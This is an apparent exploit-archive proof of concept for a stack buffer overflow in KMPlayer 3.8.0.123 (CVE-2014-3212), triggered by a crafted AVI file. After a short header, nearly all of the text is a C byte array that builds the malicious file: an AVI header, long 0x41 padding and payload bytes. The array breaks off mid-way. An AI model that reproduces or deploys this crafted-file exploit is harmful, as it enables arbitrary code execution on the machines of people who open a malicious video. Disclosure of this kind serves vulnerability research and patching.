|
# Exploit Title: [Kmplayer stack overflow vulnerability latest Version
3.8.0.123 ]
# Date: [2014/05/04]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : https://www.linkedin.com/profile/view?id=276969082
# Vendor Homepage: [www.kmplayer.com]
# Software Link: [
http://filehippo.com/download_kmplayer/download/30f8de407469f3a6d207e907c1b6726e/
]
# Version: [Version 3.8.0.123 and prior to that]
# Tested on: [Windows Xp Sp 3 x86]
# CVE : [CVE-2014-3212]
details:
KM Player latest version is vulnerable to a stack based buffer overflow
vulnerability due to improper handling of buffers when parsing AVI file
format which allow attackers to execute arbitrary code .
tested on Windows XP SP3 x86
.
poc:
#include "stdafx.h"
#include <Windows.h>
#include <conio.h>
unsigned char sc[] =
{
0x52,0x49,0x46,0x46,0xE8,0x69,0x04,0x00,0x41,0x56,0x49,0x20,0x4C,0x49,0x53,0x54,0xC0,0x00,0x00,0x00,0x68,0x64,0x72,0x6C,0x61,0x76,0x69,0x68,0x38,0x00,0x00,0x00,0x9B,0x6F,0x00,0x00,0x5E,0x74,0x01,0x00,0x00,0x00,0x00,0x00,0x10,0x08,0x00,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x02,0x0C,0x00,0x00,0x00,0x01,0x00,0x00,0xF0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x4C,0x49,0x53,0x54,0x74,0x00,0x00,0x00,0x73,0x74,0x72,0x6C,0x73,0x74,0x72,0x68,0x38,0x00,0x00,0x00,0x76,0x69,0x64,0x73,0x63,0x76,0x69,0x64,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x23,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x6E,0x00,0x00,0x00,0x02,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0xF0,0x00,0x73,0x74,0x72,0x66,0x1F,0x00,0x00,0x00,0x28,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0xF0,0x00,0x00,0x00,0x01,0x00,0x18,0x00,0x49,0x56,0x34,0x31,0x00,0x1C,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x4A,0x55,0x4E,0x4B,0x18,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x00,0x00,0x4C,0x49,0x53,0x54,0x08,0x5B,0x04,0x00,0x6D,0x6F,0x76,0x69,0x30,0x30,0x64,0x62,0x72,0x07,0x00,0x00,0xF8,0xFF,0x83,0x70,0x07,0x00,0x0E,0x0F,0x00,0x10,0x80,0x0F,0x00,0x00,0x86,0x59,0x0C,0xE9,0x7D,0x00,0x80,0x17,0x00,0x0D,0xE9,0x05,0x86,0x40,0x8B,0x6C,0xC0,0xE0,0x10,0xC2,0x53,0xF2,0xD2,0x10,0x61,0x31,0x73,0x81,0x03,0xFE,0x77,0x1A,0x00,0x00,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9A,0xE7,0x79,0x9E,0xE7,0x78,0x9E,0xE7,0x79,0x9C,0xE7,0x38,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE3,0x79,0x9E,0xC7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0x78,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0x78,0x9E,0xE7,0x69,0x9E,0xE7,0x79,0x9A,0xE7,0x69,0x9A,0xA7,0x69,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x1E,0xE7,0x39,0x1A,0x63,0x39,0x1E,0xE7,0x79,0x8E,0xA7,0x58,0x9E,0x22,0x20,0x9E,0xE7,0x79,0x9A,0xE7,0x79,0x8E,0xA3,0x39,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0x79,0x0E,0xE7,0x79,0x9E,0xE7,0x79,0x9E,0xE7,0xF9,0xF0,0x1C,0xCF,0x72,0x30,0xC7,0xF2,0x3C,0xCF,0xF3,0x3C,0xC7,0x03,0x1C,0x0F,0x72,0x18,0xC0,0xF3,0x3C,0xCF,0x52,0x3C,0xCF,0x93,0x04,0x4F,0x23,0x3C,0x4E,0x03,0x4F,0xB8,0xEB,0xE2,0xEC,0x98,0x90,0xED,0x80,0x97,0xC5,0xF5,0x31,0xB7,0xCD,0xDE,0x71,0x7C,0xC0,0x87,0x26,0x8A,0x57,0x13,0xEF,0xF1,0x03,0x91,0x92,0x53,0x50,0xB2,0x84,0x06,0xFB,0x11,0x77,0x6C,0x72,0xAB,0x64,0xF0,0x9E,0x57,0xDD,0x64,0x31,0x4F,0x5C,0xC9,0x76,0x44,0xCA,0x16,0x0C,0x47,0xBC,0xA8,0x89,0x65,0x62,0x70,0xE2,0xEA,0x80,0x17,0x4E,0x5C,0x91,0x47,0xF1,0xA1,0x18,0x94,0x38,0x62,0x9C,0xB8,0x3A,0x60,0x97,0x25,0xE4,0xBC,0x89,0x89,0x60,0x61,0x60,0x2D,0x64,0xD3,0x3A,0xC6,0x22,0x8A,0x85,0x3D,0x48,0x93,0xB3,0x20,0x45,0x6E,0x63,0xC0,0xE6,0x86,0xE0,0x93,0xC4,0xC8,0xD9,0x51,0xF0,0xA2,0x78,0x13,0xC1,0xA6,0xBC,0x22,0xBA,0x59,0x90,0x2B,0xF6,0x22,0xEA,0xC9,0x23,0xE1,0xA5,0x43,0xB1,0x75,0x1F,0xF0,0x22,0x12,0xD3,0xE2,0xBD,0x9D,0xC4,0x31,0xD1,0xCC,0xEC,0x04,0x23,0x43,0xDF,0xB3,0x79,0xCC,0x0D,0xE7,0xB2,0x71,0xC5,0x3A,0x32,0x07,0xB2,0x0E,0x13,0xC1,0x19,0xC1,0x75,0xC4,0x78,0xC0,0x10,0xEC,0xD5,0xC5,0xC2,0xD6,0x2C,0xC5,0x56,0xC5,0x6D,0xB3,0x17,0x6F,0x46,0xF2,0x03,0x71,0xD6,0xAC,0x8D,0xDC,0x86,0xDC,0x10,0xAC,0xD5,0x2C,0x47,0x24,0x71,0x4C,0x70,0xC5,0xCC,0xCE,0xC0,0x47,0x3B,0x95,0x9B,0xE2,0xFA,0x88,0xA7,0x44,0xB1,0x3F,0xE2,0xE9,0x31,0x6B,0x05,0x4B,0x15,0x83,0x9C,0xF1,0xB0,0x39,0x0B,0x52,0xD9,0x8F,0x9A,0xA5,0x0D,0x0A,0xD9,0x26,0xF6,0x9A,0x70,0x0D,0x0A,0x52,0x3E,0xC4,0x81,0x9C,0xB3,0xB0,0xBD,0x63,0xE6,0x8A,0x5B,0xD6,0xC0,0xE3,0x63,0x9E,0x2E,0x51,0x72,0x5B,0x74,0xCA,0x56,0x0C,0x5C,0x2B,0x4B,0xC9,0xD5,0x31,0x1E,0x10,0x21,0x73,0x11,0xC7,0xAC,0x39,0x18,0xE4,0xC4,0x4D,0x61,0x37,0x51,0x64,0x61,0x71,0x75,0xC0,0xDC,0x24,0xC1,0xCE,0x80,0x3C,0x95,0x95,0xE2,0x8C,0xB7,0xDC,0x76,0x31,0x74,0x33,0x14,0xB7,0xDC,0x18,0xBC,0xE4,0x55,0xC9,0x8D,0xF7,0x78,0xCC,0xC6,0x3A,0x31,0x7F,0x10,0xCE,0x82,0x34,0x78,0x75,0xC0,0xC2,0x7B,0x82,0xC7,0xCD,0x73,0xD9,0x8A,0x96,0x39,0x82,0x9B,0xE6,0x9C,0x10,0xAB,0x19,0x8A,0x6B,0x79,0x4F,0x16,0xE7,0x35,0xF1,0xF4,0x9E,0x54,0xA2,0x58,0xD9,0x8A,0xBD,0xD8,0x9A,0xEB,0xE6,0x6C,0x62,0x1D,0x39,0x43,0x6E,0x8F,0x39,0x33,0x09,0xD4,0x66,0x61,0xF7,0x35,0x37,0x24,0x51,0xC4,0x18,0x5C,0x07,0x37,0xB2,0x94,0xAC,0x5C,0x33,0x44,0x10,0x13,0xBF,0xF1,0xFC,0x2A,0xE6,0x91,0x6F,0x7B,0xC8,0x4B,0xAE,0x39,0xAB,0xE6,0x8E,0x6B,0x0C,0x83,0xBD,0x82,0xB3,0x63,0x92,0xA8,0xE0,0x6D,0x85,0x3C,0x2F,0x0E,0x82,0xCB,0x0E,0x86,0xD3,0x7B,0x9E,0xF2,0x9E,0xC7,0x13,0x37,0xD1,0xEC,0xC5,0x36,0x71,0x6D,0xF3,0xA1,0x1B,0x3D,0x60,0xE3,0x95,0xD1,0x6C,0xC5,0xDD,0x01,0xD9,0xCD,0x39,0x3B,0x6F,0xA4,0x83,0x94,0xFC,0x40,0xDC,0x70,0x7B,0xC0,0x7E,0xC0,0xE2,0xC4,0x53,0x66,0x86,0x60,0x90,0x59,0x79,0xC3,0x75,0x29,0x67,0xBC,0x65,0x93,0x3D,0xB8,0x2A,0x31,0x08,0xB9,0x0E,0x39,0x63,0x60,0x8F,0xA0,0x27,0x26,0x79,0xC2,0x58,0x2F,0x87,0x18,0x96,0x89,0x27,0x9C,0xD5,0x11,0x4F,0xF8,0xD0,0xF9,0x32,0x3F,0x36,0x4F,0x78,0x91,0x51,0x4A,0x66,0x34,0x77,0xB1,0x1A,0x2C,0xAE,0xCA,0x35,0xD9,0x3C,0x7D,0x44,0x3C,0x62,0x2D,0x6E,0x27,0xDE,0x1F,0x71,0x53,0xBC,0x2A,0x42,0x79,0x7A,0xC4,0x52,0x7C,0xA4,0xE2,0xA5,0xDC,0x15,0x23,0xAF,0x8E,0xC9,0x91,0x0F,0x51,0x8C,0x3C,0x66,0x9E,0xF8,0x18,0x45,0x14,0x1F,0x5C,0xE6,0x90,0x8F,0x51,0x8C,0x3C,0x66,0x0B,0x9B,0x37,0x45,0x14,0x8F,0xAB,0xB8,0x29,0x9E,0x16,0x51,0x3C,0x2C,0x86,0xE2,0x8E,0xE0,0x96,0xB9,0x78,0x49,0xD6,0x93,0x47,0xC2,0x75,0x24,0x59,0xBC,0x27,0x8B,0x57,0x15,0xCC,0xCA,0xF3,0x7A,0xF2,0x48,0x08,0x5E,0x1D,0x31,0x14,0x77,0xBC,0x28,0xBE,0xF7,0xCD,0x6D,0x2C,0xD1,0xF2,0x4B,0xBC,0x38,0xE2,0x86,0xE0,0xB2,0xA9,0x81,0x8F,0x80,0x7C,0xCC,0x58,0xD8,0x8C,0x91,0x8F,0x40,0xF0,0x09,0x9B,0x25,0x06,0x3E,0x32,0x1F,0x37,0x07,0x3C,0xE5,0x53,0x92,0x3C,0x6E,0x66,0x07,0x3E,0x01,0xC9,0xC7,0x8C,0x81,0xA5,0x47,0x3E,0x02,0x1B,0x9F,0xF6,0x94,0x37,0x11,0xBC,0x67,0xE1,0x71,0x46,0xB3,0x36,0x1F,0x83,0x17,0x87,0x5C,0xF7,0xC4,0xC7,0x40,0x1E,0x46,0x90,0xC9,0x4B,0x06,0x3E,0x78,0x73,0xC7,0x15,0xAF,0x0C,0x9A,0x97,0x5C,0xCB,0x79,0xF3,0x21,0x98,0x59,0x39,0x97,0x97,0xBC,0x1A,0x82,0x2B,0x36,0xDE,0xF6,0xC4,0x55,0xF0,0xC5,0x22,0x46,0x79,0xB8,0x46,0xF4,0x07,0x09,0x3E,0xF5,0xD1,0xC8,0xE2,0xCC,0xE7,0x8B,0xE6,0xCD,0x6C,0x68,0xF0,0xF1,0x1F,0xF1,0xA6,0xF8,0x54,0x27,0x9C,0x1E,0xF3,0x51,0x8F,0x38,0x8B,0xE4,0xD3,0xCD,0x3F,0xC5,0xCC,0x67,0x35,0xF1,0x88,0x8F,0x59,0xA3,0xAC,0xB3,0xD3,0x07,0xE1,0x33,0x1E,0x11,0x47,0x7C,0x8A,0x41,0x6E,0x0E,0xF9,0x58,0x47,0x64,0xF1,0xE9,0x6A,0xF2,0x83,0x72,0x11,0x3C,0x2F,0xCE,0x8A,0x4F,0x31,0xF7,0x27,0x0F,0xE6,0xE1,0x80,0x4F,0x53,0xE4,0x11,0xB7,0x35,0xF2,0xF0,0x13,0xF3,0xF1,0x8B,0xBD,0xB8,0x1D,0x98,0xE7,0x03,0x2E,0x42,0x54,0x3E,0x5A,0x1C,0x72,0xC1,0x56,0x6C,0xC5,0x65,0x1E,0x73,0xB6,0x1C,0xF0,0xB4,0x88,0x90,0xEB,0xE4,0xFA,0x84,0x0F,0xA1,0xAC,0xC5,0xC0,0x07,0x98,0xF9,0x08,0xAC,0xCA,0x8B,0x85,0x97,0x87,0x0C,0xC5,0xC6,0x47,0x3B,0xE1,0xFD,0xC0,0x50,0x6C,0x85,0xC5,0x82,0x0C,0xC8,0x80,0xC8,0x80,0x04,0x41,0x12,0x04,0x81,0xC8,0xC2,0xCA,0xC2,0x40,0x22,0x1B,0x33,0x72,0x46,0x32,0x73,0x45,0xB2,0x32,0x30,0x20,0x49,0x10,0x04,0x33,0xB2,0x20,0xC9,0x86,0xC8,0xC0,0x5A,0x0C,0x0C,0xBC,0x20,0x90,0x0D,0x19,0x90,0x60,0x40,0x24,0x18,0x08,0x64,0xC0,0x62,0x61,0x60,0x8D,0x51,0x82,0x85,0xAF,0xEF,0x30,0x84,0x7C,0x81,0x39,0xC6,0x89,0x97,0xAC,0xCF,0x92,0xA1,0x65,0x23,0xF8,0x66,0x5E,0xC5,0x30,0x84,0x1E,0x46,0xF8,0x61,0x3E,0x10,0x9F,0x6B,0x8D,0x88,0x63,0x2E,0x48,0x6E,0x98,0x99,0x49,0x36,0x82,0x1D,0xB9,0x62,0x27,0xD8,0x58,0xD9,0x48,0x92,0x60,0xE1,0xA3,0xB5,0x6C,0x2D,0x5F,0xCA,0x3A,0xE6,0x2E,0xA2,0xF9,0x02,0x24,0x9F,0xE3,0x19,0x37,0xCD,0xC7,0x3A,0x15,0x4F,0xE5,0x8B,0xC6,0x14,0xDC,0xF0,0x69,0x4E,0x25,0x4E,0x7D,0xF2,0x50,0xF8,0x14,0x07,0x87,0x5C,0xE5,0xC4,0x27,0x6B,0x26,0x3E,0x26,0xD7,0x27,0x7C,0xF6,0x66,0x6E,0x3E,0x61,0x73,0x96,0x4E,0x7C,0x76,0x1E,0xC6,0x01,0x57,0xBC,0x8D,0x2E,0x3E,0xA6,0xF5,0xE4,0xA1,0x70,0x31,0xFC,0x1E,0x1F,0x7C,0x7E,0x76,0x92,0xCA,0x47,0x5D,0x3E,0x2C,0xDF,0x3B,0x8E,0x79,0x93,0x4E,0xCA,0xFE,0x81,0x4E,0xF8,0xA8,0xAB,0x1F,0x9B,0xF7,0x73,0x1E,0xBF,0x8B,0x27,0xA7,0xC2,0x67,0x9C,0xF9,0x00,0xBE,0xE3,0x63,0x24,0x37,0x5C,0x07,0x03,0xE7,0xC3,0x01,0xFB,0xE9,0x3D,0x57,0xCD,0xA7,0x30,0x78,0xDA,0xDC,0x9D,0x12,0xA7,0xCC,0x56,0xF0,0